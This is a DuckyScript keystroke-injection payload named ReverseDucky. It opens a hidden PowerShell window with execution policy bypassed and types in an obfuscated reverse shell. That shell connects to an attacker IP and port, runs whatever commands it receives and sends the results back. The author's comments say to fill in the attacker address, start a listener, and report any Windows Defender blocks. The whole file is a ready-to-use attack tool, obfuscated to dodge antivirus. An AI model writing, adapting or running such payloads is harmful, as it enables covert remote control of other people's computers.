REM       ReverseDucky
REM       Version 1.2
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13

REM       Reverse shell executed in the background - If blocked by Windows Defender, please contact me.
REM       Fill in Attacker IP & Port in line 18
REM       DON'T FORGET TO START LISTENER

DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden -Exec Bypass
DELAY 250
ENTER

DELAY 200
STRING $I='0.0.0.0';$P=4444;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($
DELAY 200
STRING I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject'
DELAY 200
STRING ) -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'PS'+(&
DELAY 200
STRING ('pw'+'d')).Path+'>';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close()
DELAY 100
ENTER
